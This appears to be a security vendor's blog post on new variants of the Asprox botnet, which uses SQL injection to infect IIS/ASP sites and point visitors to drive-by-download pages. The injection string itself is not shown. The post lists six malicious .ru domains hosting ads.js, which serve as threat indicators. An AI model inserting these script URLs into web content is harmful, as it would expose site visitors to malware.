Do you remember Asprox, the botnet that used SQL injection attacks combined with result from search engine like Google to automatically infect Microsoft IIS powered websites? We did a talk (slides) at last Virus Bulletin about that, and for about a month now, we've been seeing some new variants in the wild.
Like last December, a blind SQL injection targeting ASP pages using Transact SQL is attempted using the following chain as a request argument:
As this string is concatenated with the HTML
www.ads-t.ru/ads.js www.bannert.ru/ads.js www.bannerdriven.ru/ads.js www.adtcp.ru/ads.js www.adbnr.ru/ads.js www.htmlads.ru/ads.js
These sites are set-up to trap victims using drive-by-download attacks. The web exploit toolkit powering those attacks was updated to also target latest vulnerabilities in Adobe Flash (swf files) and Adobe Reader (pdf files).
The injection vector is still the same as last year (vulnerable server-side scripts), however from the results we can get, there are still many web applications vulnerable to SQL injection attacks (and I believe this is a never-ending battle). So why should they look for another attack vector? Besides, the web exploit toolkit update ensure a steady rate of newly infected machines, and a constant growth of their Botnet.
At the VB conference, during the Q&A session of our speech, a cunning attendee suggested that the positive side of last year's ubiquitous Botnet-powered SQL injection campains was that at least, it served as a giant pen-test for the Web. Unfortunately, it seems that the pen-test aftermath, as alarming as it was, did not suffice to raise the awareness of webmasters to a point where cybercriminals would stop to have an endless supply of machines ready to be infected.
Did you update your third-party software recently?
Fortinet customers are protected using Fortiguard IPS that detects malicious SQL queries in HTTP requests.